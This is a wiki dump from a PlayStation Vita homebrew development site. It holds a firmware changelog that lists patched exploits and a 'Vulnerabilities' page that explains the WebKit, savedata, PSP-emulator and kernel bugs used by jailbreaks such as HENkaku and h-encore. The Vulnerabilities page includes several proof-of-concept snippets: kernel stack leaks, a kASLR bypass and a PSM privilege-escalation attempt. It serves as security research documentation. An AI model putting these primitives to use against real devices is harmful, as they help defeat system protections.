* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|align=center|'''3.72'''<br />August 27, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.73'''<br />October 16, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11638Main Page/Header2019-09-28T14:43:45Z<p>Xyz: Undo revision 11235 by Xyz (talk)</p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).<br />
<br />
Alternatively, you can chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or on IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11637Main Page/Header2019-09-28T14:43:03Z<p>Xyz: Reverted edits by CelesteBlue (talk) to last revision by Xyz</p>
<hr />
<div><br />
== Welcome To The One And Only Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).<br />
<br />
Alternatively, you can chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or on IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11507Vulnerabilities2019-09-18T23:08:53Z<p>Xyz: /* F00D Processor */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) (CVE-2010-4577 and CVE-2010-1807) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.72) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next PSVita kernel exploit, named 2050 and 2051. TheFloW also have a WebKit exploit and it may be same or different than xyz's.<br />
<br />
Working on <= 3.72. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall id (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall id passed in R12 can overflow syscall table and cause an arbitrary kernel function pointer to be dereferenced then executed.<br />
<br />
Tested on 1.50-1.60. Patched on 1.61.<br />
<br />
=== Syscall handler leaks syscall table vaddr ===<br />
<br />
Calling svc with an invalid syscall id will end the svc interrupt without clearing syscall table vaddr in r0.<br />
<br />
Tested on 1.50. ?Patched on 1.61?<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
